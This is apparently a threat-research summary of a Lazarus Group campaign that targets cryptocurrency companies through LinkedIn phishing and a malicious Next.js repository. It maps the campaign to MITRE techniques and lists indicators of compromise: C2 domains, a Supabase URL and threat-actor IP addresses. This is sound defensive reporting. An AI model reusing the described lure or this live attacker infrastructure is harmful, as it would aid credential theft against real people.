Threat Research

Lazarus Targeting Crypto via Phishing

Securonix
Lazarus Targeting Crypto via Phishing

The Lazarus Group, linked to North Korea, employs a combination of unsophisticated phishing tactics and advanced post-exploitation techniques to target cryptocurrency companies. Their operational security lapses, including exposed databases and leaked IP addresses, provide key insights into their activities. #LazarusGroup #BeaverTail #Supabase

Keypoints

  • The Lazarus Group has targeted multiple cryptocurrency platforms such as Phemex, WazirX, Bybit, and Stake using phishing as an initial infection vector.
  • The group comprises multiple subgroups with varying levels of technical sophistication, from social engineering to advanced exploitation of AWS infrastructure.
  • A recent campaign involved contacting a BitMEX employee via LinkedIn with malicious GitHub repository code aiming to deploy malware through a Next.js/React project.
  • The malware communicates with command and control (C2) servers and uses obfuscated JavaScript to steal credentials and collect system metadata via a Supabase database.
  • The Supabase database used by the attackers was misconfigured, exposing 37 records of infected computers and revealing operational security mistakes including use of a residential Chinese IP.
  • Analysis of victim data revealed distinct user patterns and operator working hours consistent with Pyongyang time zones, indicating structured daily schedules.
  • Identification of multiple threat actor aliases and associated IP addresses aids in tracking and mitigating ongoing infections linked to this campaign.

MITRE Techniques

  • [T1566] Phishing – Initial access was gained by tricking employees into running malicious code, e.g., β€œtricked a Safe Wallet employee into running malicious code on their computer.”
  • [T1176] Browser Extensions – The malware contained references to Chrome extension IDs indicating credential theft via browser components.
  • [T1059.007] Command and Scripting Interpreter: JavaScript – Use of obfuscated JavaScript executed through eval calls to retrieve and run malicious scripts from C2 servers.
  • [T1078] Valid Accounts – Post-exploitation operations included access to AWS accounts to modify wallet source code and facilitate theft.
  • [T1531] Account Manipulation – Modifications to Safe’s AWS frontend code to compromise cold wallets suggest manipulation of target accounts and software.
  • [T1598] Phishing via Social Media – Contacting victims through LinkedIn under the guise of NFT marketplace collaboration to deliver malware.
  • [T1005] Data from Local System – Collection of system metadata (username, hostname, IP, geolocation) via Supabase database.

Indicators of Compromise

  • [Domain] C2 and malware delivery infrastructure – regioncheck.net, fashdefi.store
  • [Supabase URL] Database used for storing victim metadata – https://mkswbddldpyiqkyu.supabase.co/
  • [IP Addresses] Associated with threat actor Victor@3-KZH – 223.104.144.97 (China Mobile residential IP), 107.182.231.193, 184.174.5.149, and others
  • [IP Addresses] Associated with other threat actors including GHOST72@3-UJS-2 (108.181.57.127), ghost@GHOST-3 (129.232.193.253), Super@3-AHR-2 (217.138.198.34)
  • [File/Repository] Malicious Next.js/React GitHub repository used to deploy malware (private repository linked via LinkedIn interaction)

Read more: https://blog.bitmex.com/bitmex-busts-lazarus-group/